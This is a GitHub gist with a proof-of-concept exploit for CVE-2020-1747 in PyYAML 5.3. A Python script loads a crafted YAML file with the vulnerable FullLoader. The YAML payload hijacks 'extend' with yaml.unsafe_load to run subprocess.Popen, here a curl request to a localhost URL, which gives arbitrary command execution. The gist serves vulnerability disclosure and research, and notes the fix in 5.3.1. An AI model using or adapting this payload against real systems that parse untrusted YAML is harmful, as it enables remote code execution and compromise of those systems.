Skip to content

Instantly share code, notes, and snippets.

@adamczi

adamczi/load.py

Last active Oct 14, 2020
Embed
What would you like to do?
CVE-2020-1747 PyYAML PoC
# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
# More: ret2libc's report in https://github.com/yaml/pyyaml/pull/386
# Explanation: https://2130706433.net/blog/pyyaml/
from yaml import *
with open('payload.yaml','rb') as f:
content = f.read()
data = load(content, Loader=FullLoader) # Using vulnerable FullLoader
# The `extend` function is overriden to run `yaml.unsafe_load` with
# custom `listitems` argument, in this case a simple curl request
- !!python/object/new:yaml.MappingNode
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://127.0.0.1/rce"]]'
state:
tag: !!str dummy
value: !!str dummy
extend: !!python/name:yaml.unsafe_load
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.